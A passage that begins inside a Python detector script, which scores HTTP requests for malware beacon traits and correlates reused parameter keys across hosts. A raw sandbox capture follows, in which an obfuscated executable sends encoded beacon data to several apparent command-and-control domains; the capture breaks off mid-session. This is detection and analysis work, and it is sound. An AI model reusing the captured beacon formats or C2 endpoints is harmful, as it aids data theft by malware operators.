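def raw_params(encoded):
    # No percent/plus decoding: the beacons send '+' and '/' literally, which a
    # browser form submission would escape as %2B and %2F.
    return [tuple(c.partition("=")[::2]) for c in encoded.split("&") if c]

def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {n.strip().lower(): v.strip() for n, _, v in (l.partition(":") for l in header_lines)}
    url = urlsplit(target)
    return {"method": method, "path": url.path, "headers": headers,
            "params": raw_params(body if method == "POST" else url.query)}

def is_base64(value):
    if not B64_VALUE.match(value) or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True

def indicators(req):
    h, params, hits = req["headers"], req["params"], set()
    encodings = [t.strip() for t in h.get("accept-encoding", "").split(",")]
    # IE 7 predates Brotli and AVIF; a client claiming MSIE 7.0 while advertising them lies.
    if "MSIE 7.0" in h.get("user-agent", "") and ("br" in encodings or "image/avif" in h.get("accept", "")):
        hits.add("ua_capability_mismatch")
    if params and all(SHORT_KEY.match(k) and is_base64(v) for k, v in params):
        hits.add("opaque_base64_params")
    if any("+" in v or "/" in v for _, v in params):
        hits.add("unescaped_form_value")
    if BEACON_PATH.match(req["path"]):
        hits.add("short_dir_path")
    ref = urlsplit(h.get("referer", ""))  # Referer names the path being posted to, no GET before it
    if ref.netloc and ref.netloc == h.get("host") and ref.path == req["path"]:
        hits.add("self_referer")
    return hits

def score(raw):
    req = parse_request(raw)
    hits = sorted(indicators(req))
    return {"host": req["headers"].get("host"), "hits": hits, "flag": len(hits) >= FLAG_THRESHOLD}

def correlate_keys(reqs):
    """Parameter keys reused verbatim against more than one host (the C2 pivot in the capture)."""
    hosts = defaultdict(set)
    for r in reqs:
        for key, _ in r["params"]:
            hosts[key].add(r["headers"].get("host", ""))
    return {k: sorted(v) for k, v in hosts.items() if len(v) > 1}

# Constructed inputs: headers as captured, Base64 shortened; the login form is invented for contrast.
SAMPLES = {
    "s13_post": build_request("POST", "www.beythome.online", "/80gy/", referer="http://www.beythome.online/80gy/",
        body="GR54yHZ8=Xqn0ftDeUaM65DHfmqOD96jp2+7Od4RSjdmCtzxoE2c1AGFBfnxB+HZCNXXJRo8I"),
    "s16_get": build_request("GET", "www.beythome.online", encoding=None,
        path="/80gy/?9xn=fHadNpk8MVax&GR54yHZ8=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJn"),
    "s17_post": build_request("POST", "www.tempatmudisini06.click", "/0kli/",
        referer="http://www.tempatmudisini06.click/0kli/",
        body="GR54yHZ8=IcIMsTazYCJeIPdA2CVJjUjwZGseKpOtn7vWThj/DV6aJcOTbkIjxNmPM0QJltze"),
    "benign_login": build_request("POST", "shop.example", "/account/login", ua=CHROME_UA,
        accept="text/html,application/xhtml+xml,*/*;q=0.8", referer="http://shop.example/account/login",
        body="user=alice&pass=Pa%2Bss%2Fword&remember=1"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        r = score(raw)
        print(f"{name:13} flag={r['flag']!s:5} {r['hits']}")
    beacons = [parse_request(SAMPLES[n]) for n in ("s13_post", "s16_get", "s17_post")]
    print("keys reused across hosts:", correlate_keys(beacons))
```

Run directly to print the hit list per request. The invented login form also trips self_referer, since a form that posts back to its own page is ordinary; that is why no single trait flags and three are required. The session 16 GET is built without Accept-Encoding, as captured, and still trips the capability check through image/avif in Accept, so the detector does not depend on any one header the operator could drop.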


Session ID: 20 | Source: 192.168.2.6:50007 | Destination: 103.21.221.4:80 | PID: 3320 | Process: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:33:06.679197073 CET | 564 | OUT | GET /0kli/?GR54yHZ8=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/AI0vJO7v6wOh3ABnBMRs5EHLHNUVXEXSqZ/A5JpvJLk63zT1cr4=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.tempatmudisini06.click
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:33:07.596127033 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 20 Nov 2024 07:33:07 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  21 | 192.168.2.6 | 50008 | 188.114.96.3 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:12.709978104 CET | 816 | OUT | POST /ipd6/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/ipd6/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 55 5a 64 59 66 43 41 54 57 63 68 7a 4a 58 71 4a 74 37 44 45 64 73 4b 4f 71 78 64 35 34 47 77 5a 55 73 65 56 34 72 42 71 41 52 55 77 62 62 39 33 66 45 6b 77 6e 44 55 59 31 31 31 32 71 58 32 57 42 72 41 57 67 4f 4b 38 6d 4d 39 53 6d 7a 6f 67 78 72 44 49 51 4c 4c 74 74 54 6c 4f 37 50 39 67 30 53 72 64 78 54 57 53 4c 49 31 66 58 54 34 6a 4c 37 59 72 6a 72 52 73 76 69 59 45 6a 55 39 6e 6f 57 75 64 79 64 42 65 42 63 58 65 6f 41 36 76 49 6e 74 75 72 4b 70 31 57 38 50 62 49 4d 38 58 79 57 47 59 30 2b 53 7a 74 75 61 58 70 76 68 49 36 33 5a 38 48 75 79 66 6e 44 66 52 47 38 75 65
                                                                                  Data Ascii: GR54yHZ8=BC3Wr1zDDmuZUZdYfCATWchzJXqJt7DEdsKOqxd54GwZUseV4rBqARUwbb93fEkwnDUY1112qX2WBrAWgOK8mM9SmzogxrDIQLLttTlO7P9g0SrdxTWSLI1fXT4jL7YrjrRsviYEjU9noWudydBeBcXeoA6vInturKp1W8PbIM8XyWGY0+SztuaXpvhI63Z8HuyfnDfRG8ue
                                                                                  Nov 20, 2024 08:33:13.288774014 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Wed, 20 Nov 2024 07:33:13 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: bf8ec536-c5dc-48c0-8e8e-2c5256a157ca
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9sQwa5CrbQRmfu%2BZRtS7XW%2BL16yvxzK5Gs2svE7Wls0nsRzIPIG38UkE2ZwmA9%2FmOIBElDmD8ZdfpTcAkZjBKnc4gU%2FCo7WjBDjwVXYGDeRezVqoaOfHb%2BfRVp5YQHn%2BGFcn79Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c0249a74c34b-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1623&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=816&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e c1 0a 82 40 14 45 7f 65 b8 6b 45 33 c7 64 3e 20 70 63 41 ed a2 c5 f8 e6 59 d2 34 2f 46 5d 44 f8 ef 21 ae cf e1 70 7e e8 c4 7d 61 c2 ec 7d 02 8e 51 e2 08 f3 03 89 63 98 32 2f 13 04 fb 66 18 b4 32 a9 a3 cc c1 21 81 e3 c9 0e 7e 84 b9 a1 15 f5 b4 c1 79 8e aa 5f a9 ea 25 aa f3 e9
                                                                                  Data Ascii: b4$@EekE3d> pcAY4/F]D!p~}a}Qc2/f2!~y_%
                                                                                  Nov 20, 2024 08:33:13.288794994 CET | 83 | IN | Data Raw: 72 55 d9 f0 71 55 86 fb b2 fa dd fc 68 42 2f 5b 3a 46 f6 76 1a 24 34 0e 06 5d 5f 33 e9 7d 95 92 76 94 96 35 e5 69 cd 35 a7 05 e9 42 57 76 a7 0f 64 91 60 9c 2c bd ae d1 12 6f b7 cb f2 07 00 00 ff ff 03 00 9d 4d 47 98 bc 00 00 00 0d 0a 30 0d 0a 0d
                                                                                  Data Ascii: rUqUhB/[:Fv$4]_3}v5i5BWvd`,oMG0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  22 | 192.168.2.6 | 50009 | 188.114.96.3 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:15.255605936 CET | 840 | OUT | POST /ipd6/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/ipd6/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 56 35 4e 59 65 68 59 54 65 63 68 79 4b 58 71 4a 30 4c 44 41 64 74 32 4f 71 7a 78 70 34 79 63 5a 61 75 47 56 35 71 42 71 4d 78 55 77 56 37 39 76 43 55 6b 37 6e 45 63 71 31 31 4a 32 71 58 79 57 42 76 45 57 68 2f 4b 39 67 63 39 51 75 54 6f 69 73 37 44 49 51 4c 4c 74 74 54 78 6b 37 50 56 67 30 43 62 64 77 32 36 56 43 6f 31 59 51 54 34 6a 50 37 5a 69 6a 72 52 65 76 6a 46 70 6a 58 56 6e 6f 54 53 64 72 73 42 64 49 63 58 59 73 41 36 36 45 57 51 6e 70 72 45 46 4a 4e 66 57 54 38 73 57 33 67 62 43 6f 4e 53 51 2f 2b 36 56 70 74 35 36 36 58 5a 57 46 75 4b 66 31 55 54 32 4a 49 4c 39 69 37 42 54 77 66 6f 33 38 38 54 52 73 43 5a 4a 71 6d 49 49 48 41 3d 3d
                                                                                  Data Ascii: GR54yHZ8=BC3Wr1zDDmuZV5NYehYTechyKXqJ0LDAdt2Oqzxp4ycZauGV5qBqMxUwV79vCUk7nEcq11J2qXyWBvEWh/K9gc9QuTois7DIQLLttTxk7PVg0Cbdw26VCo1YQT4jP7ZijrRevjFpjXVnoTSdrsBdIcXYsA66EWQnprEFJNfWT8sW3gbCoNSQ/+6Vpt566XZWFuKf1UT2JIL9i7BTwfo388TRsCZJqmIIHA==
                                                                                  Nov 20, 2024 08:33:15.886771917 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Wed, 20 Nov 2024 07:33:15 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 9aec1926-cafa-452e-aa7d-0425c9cda55f
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Lvr2uCh35MA86m2MQpiukXM0ZRmH9T6%2B3Mr5upwZxjVDyiC8aTLglePHJmMbKfj%2BuBiQU9Wb18wngcW8exNZO4Wcdm%2Fq3KQDWEUAw0QwmCWA2FGiHb1wMO03M7oLijhWEfc5Qs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c034cc058cc8-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4981&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=840&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e c1 0a 82 40 14 45 7f 65 b8 6b 25 13 2d 9c 0f 08 dc 58 90 bb 68 f1 9c f7 a6 a4 69 5e 8c ba 88 f0 df 23 5a 9f c3 e1 7c 30 28 bf 61 e3 12 42 06 49 49 d3 04 fb 81 53 16 d8 aa a8 32 44 7a 0a 2c 3a 9d cd 41 97 c8 c8 c0 32 d3 18 26 d8 0b 3a 35 77 8a 1c 24 19 ff a3 c6 6b 32 a7 e3 b9 37 9b f1 c5 bb 0d
                                                                                  Data Ascii: b3$@Eek%-Xhi^#Z|0(aBIIS2Dz,:A2&:5w$k27
                                                                                  Nov 20, 2024 08:33:15.886794090 CET | 76 | IN | Data Raw: ae eb cf 1f 96 5b 1b bd fe d3 29 49 a0 79 d4 d8 32 2c 1a 12 b7 6d ca 5d ee c8 53 5e d5 a5 e4 44 7b ce 8b aa ac 5d e3 98 ea da 23 c3 34 93 7b f4 89 9c fc 6f d7 f5 0b 00 00 ff ff 03 00 35 b6 32 a5 bc 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: [)Iy2,m]S^D{]#4{o520


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  23 | 192.168.2.6 | 50010 | 188.114.96.3 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:17.809768915 CET | 1853 | OUT | POST /ipd6/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/ipd6/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 56 35 4e 59 65 68 59 54 65 63 68 79 4b 58 71 4a 30 4c 44 41 64 74 32 4f 71 7a 78 70 34 79 55 5a 61 66 6d 56 37 4a 5a 71 4e 78 55 77 64 62 39 37 43 55 6b 63 6e 46 35 68 31 31 46 6d 71 52 75 57 42 4b 51 57 6d 4e 75 39 70 63 39 51 69 7a 6f 6e 78 72 43 53 51 50 58 68 74 54 68 6b 37 50 56 67 30 45 33 64 77 6a 57 56 4f 49 31 66 58 54 34 2f 4c 37 5a 4b 6a 72 5a 4f 76 6a 42 66 69 6e 31 6e 70 33 4f 64 70 36 39 64 44 63 58 61 72 41 37 2f 45 57 63 6b 70 72 5a 30 4a 4e 71 39 54 36 51 57 30 30 2b 31 34 66 47 5a 6d 34 36 56 79 75 45 51 78 69 39 35 63 65 43 30 39 57 48 70 42 6f 50 78 76 38 35 4b 6d 64 64 33 70 73 6a 77 79 45 39 57 6c 79 68 36 59 46 67 4c 31 6b 41 6f 7a 56 6f 62 6e 38 37 47 79 79 5a 46 37 7a 59 50 4d 47 33 6a 68 49 79 55 34 68 68 51 57 68 38 53 48 56 38 70 58 66 4d 56 6e 69 71 4d 38 53 38 7a 68 4d 47 67 39 6b 2b 56 53 2f 62 5a 42 57 45 2f 6a 6e 48 5a 72 6d 47 4a 39 4c 4c 4c 62 78 5a 33 6c 42 64 4c 6e 6b 78 56 53 6c 43 37 5a 45 39 66 50 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8= [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:18.423091888 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Wed, 20 Nov 2024 07:33:18 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 942dc704-fdbc-4f85-ab79-cf3b078b69ca
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9r7YXTCGWgm700kcS69%2BSKgT1T4CmyhXxMlraSWXaxYu6a75xU%2FtiEj%2BBPowqk61VXQwrlILagut3d9in0kJoWOztCFXLG69KVaBfm828FrCNzHo33%2BN68EMOAzLL6SFkULDNQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c044acf741cf-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2036&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1853&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 41 0e 82 30 14 05 af d2 bc 35 04 a2 15 a4 07 30 61 83 26 b2 33 2e da fe 56 89 b5 df 14 58 18 c2 dd 0d 71 3d 93 c9 2c 30 4c 5f a8 38 87 90 c1 a5 c4 69 84 5a 60 99 1c 94 2c 65 86 a8 df 0e 0a 1d 4f e2 c4 73 24 64 20 37 e9 21 8c 50 37 74 2c 9e 3a 52 70 49 f8 8d 0a cf 49 5c ce d7 5e 14 c3
                                                                                  Data Ascii: b5$A050a&3.VXq=,0L_8iZ`,eOs$d 7!P7t,:RpII\^
                                                                                  Nov 20, 2024 08:33:18.423111916 CET | 81 | IN | Data Raw: 87 aa 02 f7 75 f3 cd fc 68 a3 e7 7f 3a 25 17 f4 34 70 6c 09 0a 8d dc 91 ad 4b 99 7b 32 36 97 fe 78 c8 b5 a9 9b dc fa bd 29 eb a3 a9 1a ab 91 61 9c b4 7d f5 49 5b f7 bf 5d d7 1f 00 00 00 ff ff 03 00 13 61 45 b9 bc 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: uh:%4plK{26x)a}I[]aE0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  24 | 192.168.2.6 | 50011 | 188.114.96.3 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:20.356177092 CET | 556 | OUT | GET /ipd6/?9xn=fHadNpk8MVax&GR54yHZ8=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5uc/jX4WzK3nYbDP1BFL1MIpigvL/S+Ybe5ZZiUbOMV88bEfnEo= HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:33:20.999013901 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Wed, 20 Nov 2024 07:33:20 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 5a33ab18-f6fa-4238-b654-c7dd8d5e838c
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TL5%2FNRGcFgnmftMw3vc2UNJtWO%2B%2FvLGW%2B0Q1X9tuPXRe7%2FD2%2FCnsYv59KDxVMIZtY4x3KcJkgX3kH8wdSp9cphzdpeGxEQD0JO8kKdzCZq2vXEXiRQkkarCrF9D%2FDbEQHDKNwTI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c054bdaa0f5f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1470&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=556&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 62 0d 0a 7b 22 62 6f 64 79 22 3a 6e 75 6c 6c 2c 22 65 72 72 6f 72 73 22 3a 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 20 68 61 6e 64 6c 65 72 20 66 6f 75 6e 64 20 66 6f 72 20 47 45 54 20 2f 69 70 64 36 2f 22 5d 7d 2c 22 64 65 62 75 67 49 6e 66 6f 22 3a 7b 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49
                                                                                  Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /ipd6/"]},"debugInfo":{"correlationI
                                                                                  Nov 20, 2024 08:33:20.999037027 CET | 68 | IN | Data Raw: 64 22 3a 22 35 61 33 33 61 62 31 38 2d 66 36 66 61 2d 34 32 33 38 2d 62 36 35 34 2d 63 37 64 64 38 64 35 65 38 33 38 63 22 2c 22 73 74 61 63 6b 54 72 61 63 65 22 3a 6e 75 6c 6c 7d 7d 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: d":"5a33ab18-f6fa-4238-b654-c7dd8d5e838c","stackTrace":null}}0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  25 | 192.168.2.6 | 50014 | 66.29.137.10 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:26.071649075 CET | 810 | OUT | POST /hayl/ HTTP/1.1
                                                                                  Host: www.callyur.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.callyur.shop
